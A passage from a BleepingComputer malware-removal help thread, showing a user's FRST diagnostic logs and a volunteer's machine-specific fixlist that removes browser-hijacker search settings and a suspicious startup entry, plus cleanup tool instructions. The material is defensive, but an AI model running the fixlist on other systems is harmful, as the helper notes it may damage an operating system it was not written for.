HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "StormAlertsApp.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "SideSync"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "wdbext"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "Windi"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{354199B7-F83D-495C-9D2C-3BA29A4920A5}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{10D8A433-FF54-408D-BD19-8ECAF71549D1}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{C8C0F0F4-0183-4523-BC93-2E0D15D26F01}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{21F97557-5316-4375-84A5-0B7440C1C0D1}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{F23838C4-65A8-4FC7-B6C2-6B70C4E93033}] => (Allow) LPort=808
FirewallRules: [{B2A68B46-9A65-4A8E-B285-1E48E4A7B975}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
FirewallRules: [{BF87AEAD-08C8-402A-835D-3474CD53CC70}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{39A33CB2-D099-4F9A-B02A-951093D131D3}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1BA4519A-A342-4BB7-B7ED-08B0A6CC57F6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{DDA3509A-3FD8-4C09-87F6-F4CB0C7DA6F4}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1A44FB89-25DE-4E0A-A722-0E07C2162364}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{0113C91F-F729-4DB8-8CD4-21A2E49DD8C6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [TCP Query User{4E874D1D-1D1B-4AA1-BD8B-A789E8030874}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{A7DAE9F1-5ADA-449C-B077-BEAAEEBF82D2}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{86453128-7424-45D8-8978-BA280CCA1BC1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
 
==================== Restore Points =========================
 
28-04-2016 18:43:41 Scheduled Checkpoint
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (04/30/2016 01:53:09 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest2" on line C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849.manifest.
 
Error: (04/30/2016 01:51:35 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest2" on line C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849.manifest.
 
Error: (04/30/2016 01:04:38 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3716) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/30/2016 01:04:38 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3716) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/30/2016 01:04:28 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3716) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/30/2016 01:04:28 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3716) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/30/2016 01:04:17 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3716) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/30/2016 01:04:17 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3716) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/30/2016 01:04:07 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3716) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/30/2016 01:04:07 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3716) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
 
System errors:
=============
Error: (04/30/2016 12:38:47 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The Xbox Live Auth Manager service terminated with the following service-specific error: 
%%0
 
Error: (04/30/2016 11:36:01 AM) (Source: volmgr) (EventID: 46) (User: )
Description: Crash dump initialization failed!
 
Error: (04/30/2016 11:35:52 AM) (Source: sptd) (EventID: 4) (User: )
Description: Driver detected an internal error in its data structures for .
 
Error: (04/30/2016 11:36:33 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 7:31:42 AM on ‎4/‎29/‎2016 was unexpected.
 
Error: (04/29/2016 07:41:43 AM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The Xbox Live Auth Manager service terminated with the following service-specific error: 
%%0
 
Error: (04/28/2016 06:09:39 PM) (Source: volsnap) (EventID: 25) (User: )
Description: The shadow copies of volume C: were deleted because the shadow copy storage could not grow in time.  Consider reducing the IO load on the system or choose a shadow copy storage volume that is not being shadow copied.
 
Error: (04/28/2016 06:07:43 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (60000 milliseconds) while waiting for the User Data Storage_Session2 service to connect.
 
Error: (04/28/2016 06:07:43 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (60000 milliseconds) while waiting for the Sync Host_Session2 service to connect.
 
Error: (04/28/2016 06:07:33 PM) (Source: DCOM) (EventID: 10010) (User: RONIN-LAPTOP)
Description: CortanaUI.AppXd4tad4d57t4wtdbnnmb8v2xtzym8c1n8.mca
 
Error: (04/28/2016 06:07:33 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session2 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
 
CodeIntegrity:
===================================
  Date: 2016-03-11 18:17:52.048
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.703
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.394
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.129
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:50.762
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.939
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.784
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.925
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.802
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 00:41:18.766
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 450 @ 2.40GHz
Percentage of memory in use: 67%
Total physical RAM: 3885.5 MB
Available physical RAM: 1282.08 MB
Total Virtual: 3885.5 MB
Available Virtual: 385.64 MB
 
==================== Drives ================================
 
Drive c: (OS_Install) (Fixed) (Total:273.4 GB) (Free:3.32 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Data) (Fixed) (Total:180.26 GB) (Free:117.9 GB) NTFS
Drive w: (BIOS_RVY) (Fixed) (Total:12 GB) (Free:3.31 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 9C73A223)
Partition 1: (Not Active) - (Size=12 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=27)
Partition 3: (Not Active) - (Size=273.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.3 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================
 
6) Security Check - 
 

 Results of screen317's Security Check version 1.014 --- 12/23/15  
   x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
Windows Defender   
 WMI entry may not exist for antivirus; attempting automatic update. 
`````````Anti-malware/Other Utilities Check:````````` 
 Java 8 Update 77  
 Java version 32-bit out of Date! 
  Adobe Flash Player 16.0.0.305 Flash Player out of Date!  
 Adobe Reader XI  
 Google Chrome (49.0.2623.110) 
 Google Chrome (49.0.2623.112) 
````````Process Check: objlist.exe by Laurent````````  
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C:  % 
````````````````````End of Log`````````````````````` 
 

#14 Jo*

Jo*

  • Malware Response Team
  • 3,445 posts
  • OFFLINE
    •  
  • Gender:Male
  • Location:Germany
  • Local time:02:32 PM

Posted 01 May 2016 - 01:52 AM

Open notepad. Please copy the contents of the code box below. To do this highlight the contents of the box and right click on it. Paste this into the open notepad.
Save it in the same location as / FSRT / FSRT64 (usually your desktop) as fixlist.txt

 
Start
CreateRestorePoint:
CloseProcesses:
CHR DefaultSearchURL: Default -> hxxp://www-searching.com/search.aspx?site=shdefault&prd=smw&pid=s&shr=d&q={searchTerms}&s=Unknown
CHR DefaultSearchKeyword: Default -> www-searching.com
CHR DefaultSuggestURL: Default -> hxxp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151]
HKLM\...\StartupApproved\StartupFolder: => "bsod.hta"
CMD: type C:\TDSSKiller.3.1.0.9_07.04.2016_15.05.40_log.txt
EmptyTemp:
Hosts:
End

NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system

Run FRST / FSRT64 again like we did before but this time press the Fix button just once and wait.
The tool will make a log (Fixlog.txt) please post it to your reply.

---

Download and run Chrome Software Cleaner

---

Please download and run the following tool to help allow other programs to run. (courtesy of BleepingComputer.com)
There are 5 different versions. If one of them won't run then download and try to run the other one.
Vista and Win7/8/10 users need to right click and choose Run as Administrator
You only need to get one of them to run, not all of them.Do not reboot your computer after running rkill as the malware programs will start again.

---

Malwarebytes' Anti-Malware
If this program is already installed: Skip the installation and run only the scan!
Download and install: Please download Malwarebytes Anti-Malware to your desktop.
  • Double-click mb3-setup-1878.1878-3.5.1.2522.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Dashboard, click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
  • In most cases, a restart will be required.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
How to get logs: (Export log to save as txt)
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Export'.
  • Click 'Text file (*.txt)'
  • In the Save File dialog box which appears, click on Desktop.
  • In the File name: box type a name for your scan log.
  • A message box named 'File Saved' should appear stating "Your file has been successfully exported".
  • Click Ok
  • Attach that saved log to your next reply.
(Copy to clipboard for pasting into forum replies or tickets)
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.
---

Try LastPass Superfish Checker

Check the certificates:

  • Click the Windows Start button
  • Type certmgr.msc into the Search box
  • Click the certmgr.msc Program to launch it
  • If prompted for administrator password, enter the password or provide confirmation
  • Click on Trusted Root Certification Authorities
  • Open Certificates
  • Look for certificates mentioning Superfish Inc.
  • Right-click on any Superfish Inc certificates and delete
  • Restart your browser
Firefox & Thunderbird Users:
  • Open Firefox
  • Click the menu in the top right and select "Options" or open the Tools menu > Options
  • Click the Advanced tab
  • Click "View Certificates"
  • Scroll through until you see Superfish Inc
  • Click the Superfish, Inc - Software Security Device option
  • Press "Delete or Distrust"
  • Confirm it shows "Superfish Inc" and press OK

Did you find certificates mentioning Superfish Inc.?

---

Edited by Jo*, 01 May 2016 - 02:58 AM.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.

#15 Jo*

Jo*

  • Malware Response Team
  • 3,445 posts
  • OFFLINE
    •  
  • Gender:Male
  • Location:Germany
  • Local time:02:32 PM

Posted 04 May 2016 - 03:50 AM

Hi,

it has been several days since I sent my last set of instructions to help with your computer problem.

Please let me know if you are having problems and still need help.

Note: Thread will be closed if no response after 3 days.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.

Back to Virus, Trojan, Spyware, and Malware Removal Help


0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users


  1. BleepingComputer.com
  2. Security
  3. Virus, Trojan, Spyware, and Malware Removal Help
  4. Privacy Policy
  5. Rules ·